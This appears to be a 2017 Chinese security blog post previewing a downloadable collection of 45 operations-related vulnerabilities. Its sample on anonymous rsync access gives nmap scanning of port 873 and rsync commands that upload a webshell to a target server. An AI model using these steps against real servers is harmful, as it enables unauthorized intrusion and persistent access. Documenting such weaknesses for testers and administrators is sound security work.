【漏洞赏析】安全运维那些洞

0x00 缘由

有人说:编程是一种美,是一门艺术,享受其中思维的妙曼身姿,一个有灵魂的程序猿叫做万物的“造物主”;

而我说:漏洞是一种美,是一个世界,畅游于黑暗的世界里探索,一个有个性的白帽子叫做世间的“救世主”。

0x01 概括

不知从何时起,养成了一个喜欢看“漏洞”的习惯,乌云的离开让很多人伤心而遗憾。不知从何时起,养成了一个喜欢记笔记、总结、思考的习惯,于是有了今天这份paper:

或许,很多朋友已经看到过标题,因为之前没有自己的公众号在T00Ls发过,后来又被人转到过爱春秋。现在打算开始尝试公众号,想起是时候把它纳入怀中了。

0x02 结构

这份 paper 没有太多个人思路,但却不失某一漏洞的利用方法及遇到的问题(当时有的没有解决,然而后来也没有继续补充)。仅单纯的按照自己的思路,记录和总结常见的运维相关安全漏洞。难免会有错误与不足(包括不全面)之处,还请大家不吝赐教。

1)很早之前为止,共收集运维相关漏洞45例

2)每例结构分为:基础知识、漏洞利用、实战演练(及修复方案)

以rsync匿名访问为例:

--1 基础知识

rsync 是一个远程数据同步工具,用 “rsync 算法”提供了一个客户机和远程文件服务器的文件同步的快速方法,在同步文件的同时,可以保持原来文件的权限、时间、软硬链接等附加信息。

下载文件:

./rsync -vzrtopg --progress --delete username@xxx.xxx.xxx.xxx::out /home/test/getfile

上传文件:

/user/bin/rsync -vzrtopg --progress /home/test/getfile username@xxx.xxx.xxx.xxx::out

--2 利用方法

rsync 默认端口是 873,可使用 nmap 进行扫描:

nmap –n –open –p 873 x.x.x.x/24

尝试上传、下载文件( kali 中):rsync 10.210.208.39::

或 rsync –vvvv rsync://10.210.208.39::

--3 实战演练

获取文件信息找到网站目录:# rsync -v xx.xx.xx.xx::

同步本地大马至远程服务器,上传webshell

# rsync -av /root/Desktop/youxiu.aspx xx.xx.xx.xx::Etest

确认是否成功: # rsync -v xx.xx.xx.xx::Etest

获取目标webshell:

3)每例中可能是一类漏洞的集合

比如struts漏洞:

又如web服务器解析漏洞:

0x03 结语

以上漏洞大餐可能时间较久,如果有想继续完善的朋友可以留言。

下载链接如下(下载即同意以上PS中的内容):

链接: https://pan.baidu.com/s/1o8mlfAE 密码: mk4d

原文发布于微信公众号 - 我的安全视界观(CANI_Security)

原文发表时间:2017-11-30

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

发表于

我来说两句

0 条评论
登录 后参与评论

相关文章

来自专栏CreateAMind

李飞飞CS231n机器视觉课程-全部视频ppt及中文翻译资源大全

http://vision.stanford.edu/teaching/cs231n/syllabus.html 官方站点资源如下,视频课程ppt都有

1062
来自专栏软件

Scratch 2.0编辑器(1)

对于Scratch2.0版本,我们可以直接使用浏览器访问在线编辑器(基于flash,可以在scratch网站点击Create创建打开)来创建程序并在社区里和其他...

42810
来自专栏黑白安全

贴吧利用仅有的信息找到对方信息

楔子: 这次的教程很简单,我是想把这个简单的教程告诫大家,作为一位网民一定要保护好自己的个人信息,周围有许许多多的网民都无所谓自己的个人隐私,殊不知已被藏在黑暗...

865
来自专栏FreeBuf

永生之火:相对持久的绕过方法和一点想

基于很多渗透测试的框架,和出色的 backdoor 程序,现在的后门已经不仅仅局限与 tcp/ip 了,今天分享的东西算不算干货呢?就靠读者朋友们来定义了。

930
来自专栏信安之路

你在github上泄漏的密码改了吗

大家作为安全爱好者或者从业者,大部分也是一个程序员,既然是程序员就离不开写代码,写代码就离不开 github,用 github 就喜欢在上面公开分享一些自己写的...

930
来自专栏生信技能树

生信小技巧第8课,加上 TCGA的28篇教程- 批量下载TCGA所有数据

(复制http://v.qq.com/x/page/v0666qu5y66.html这个链接在浏览器打开观看,当然,腾讯视频会给你看一分钟广告,而且需要自己选择...

1103
来自专栏极客猴

Linux ,越折腾越喜欢

今天这波分享可以说是自己热血来潮。起因是自己收到某个问答社区小秘的问题邀请。问题是《谁能给我推荐几本linux的书?从基础到进阶提高的linux书?》。自己挺怀...

723
来自专栏FreeBuf

周末娱乐:讲真,这才是我所说黑客的定义!

看到一篇挺好玩的文章,哈哈,翻译过来你们感受一下这geekstyle的魔性。 我一基友,在俄罗斯bash.org上po了一个帖子,贼6!所以我决定转一下,po到...

1775
来自专栏DeveWork

初体验 Ghost : yet another WordPress?

早就听说Ghost 的大名了,但一直以来却没有去折腾过。今天晚上特意花了些时间在到手的DigitalOcean 上部署了Ghost,过程算坎坷的,水文一下。 G...

20810
来自专栏FreeBuf

低成本安全硬件实战遇到的那些事

世界属于终端 世界属于Linux 世界属于算法 楔子 今年二月份,通过@ya0guang大神的文章我初步接触到了安全硬件低成本调教的姿势,我将跟随ya0guan...

1959

扫码关注云+社区